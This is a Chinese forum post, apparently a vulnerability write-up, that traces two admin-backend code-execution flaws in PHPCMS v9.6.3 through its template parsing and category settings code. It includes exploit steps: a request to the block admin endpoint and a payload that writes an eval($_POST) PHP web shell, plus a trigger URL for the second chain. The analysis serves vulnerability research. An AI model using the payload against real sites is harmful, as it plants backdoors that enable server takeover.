phpcmsv9.6.3漏洞之后台几处漏洞分析
phpcmsv9.6.3漏洞之后台GETSHELL首先全局搜一下调用include或者require的地方
跟进到
if (@file_put_contents($filepath,$str)) {
ob_start();
include $filepath;
$html = ob_get_contents();
ob_clean();
@unlink($filepath);
}
往上走
$str = $tpl->template_parse(new_stripslashes($template));
字符串是从这里取出,往上走
$template = isset($_POST['template']) && trim($_POST['template']) ? trim($_POST['template']) : '';
直接post过数据来,没经过任何处理,那么只要构造一下传过恶意数据来即可。首先向http://www.test.com/phpcms/install_package/index.php?m=block&c=block_admin&pc_hash=B8mgrw&a=add&pos=1post:dosubmit=1&name=ac&type=2然后填入payload<?php file_put_contents("phpcms_shell.php","<?php eval($_POST);?>");GETSHELL(二)另外一个地方是利用cache处的编译,因为没有限制模板文件路径,导致只要有可控的html页面,即可到达include实现getshell。首先看modules\admin\category.php处$setting = $_POST['setting']; if($_POST['info']['type']!=2) { //栏目生成静态配置 if($setting['ishtml']) { $setting['category_ruleid'] = $_POST['category_html_ruleid']; } else { $setting['category_ruleid'] = $_POST['category_php_ruleid']; $_POST['info']['url'] = ''; } }
//内容生成静态配置 if($setting['content_ishtml']) { $setting['show_ruleid'] = $_POST['show_html_ruleid']; } else { $setting['show_ruleid'] = $_POST['show_php_ruleid']; } if($setting['repeatchargedays']<1) $setting['repeatchargedays'] = 1; $_POST['info']['sethtml'] = $setting['create_to_html_root']; //die(print_r($setting)); $_POST['info']['setting'] = array2string($setting); die(print_r($_POST['info'])); $end_str = $old_end ='<script type="text/javascript">window.top.art.dialog({id:"test"}).close();window.top.art.dialog({id:"test",content:\'<h2>'.L("add_success").'</h2><span style="fotn-size:16px;">'.L("following_operation").'</span><br /><ul style="fotn-size:14px;"><li><a href="?m=admin&c=category&a=public_cache&menuid=43&module=admin" target="right" >'.L("following_operation_1").'</a></li><li><a href="'.HTTP_REFERER.'" target="right">'.L("following_operation_2").'</a></li></ul>\',width:"400",height:"200"});</script>'; if(!isset($_POST['batch_add']) || empty($_POST['batch_add'])) { $catname = CHARSET == 'gbk' ? $_POST['info']['catname'] : iconv('utf-8','gbk',$_POST['info']['catname']); $letters = gbk_to_pinyin($catname); $_POST['info']['letter'] = strtolower(implode('', $letters));
$catid = $this->db->insert($_POST['info'], true);setting信息没有经过任何处理直接插入数据库,也就是达到了上文没有限制模板文件路径。那么继续往下找,setting字段既然有入库操作,必然有出库操作。全局搜索一下跟进第一处,往下走看到include template('content',$template);
跟进template函数,在libs\functions\globals.func.php,主要代码如下
$compiledtplfile = PHPCMS_PATH.'caches'.DIRECTORY_SEPARATOR.'caches_template'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.php';
if(file_exists(PC_PATH.'templates'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html')) {
if(!file_exists($compiledtplfile) || (@filemtime(PC_PATH.'templates'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html') > @filemtime($compiledtplfile))) {
$template_cache->template_compile($module, $template, $style);
}
} else {
$compiledtplfile = PHPCMS_PATH.'caches'.DIRECTORY_SEPARATOR.'caches_template'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.php';
if(!file_exists($compiledtplfile) || (file_exists(PC_PATH.'templates'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html') && filemtime(PC_PATH.'templates'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html') > filemtime($compiledtplfile))) {
$template_cache->template_compile($module, $template, 'default');
} elseif (!file_exists(PC_PATH.'templates'.DIRECTORY_SEPARATOR.'default'.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html')) {
showmessage('Template does not exist.'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR.$template.'.html');
}
}
就是一个编译的过程,继续跟入template_compile,主要代码如下
$content = @file_get_contents ( $tplfile );
$filepath = CACHE_PATH.'caches_template'.DIRECTORY_SEPARATOR.$style.DIRECTORY_SEPARATOR.$module.DIRECTORY_SEPARATOR;
if(!is_dir($filepath)) {
mkdir($filepath, 0777, true);
}
$compiledtplfile = $filepath.$template.'.php';
$content = $this->template_parse($content);
$strlen = file_put_contents ( $compiledtplfile, $content );
tpfile=>page_template,然后就是编译成php的过程,现在即可到达include实现这个条件也达成,然后只是去找个可控的html文件。
可控的html文件比较多,如下
结合上面
因为burp不方便直接抓包,先提交然后看history
然后找到catid
访问
http://www.test.com/phpcms_v9.6.3_UTF8/install_package/index.php?m=content&c=index&a=lists&catid=15
即可getshell。
页:
[1]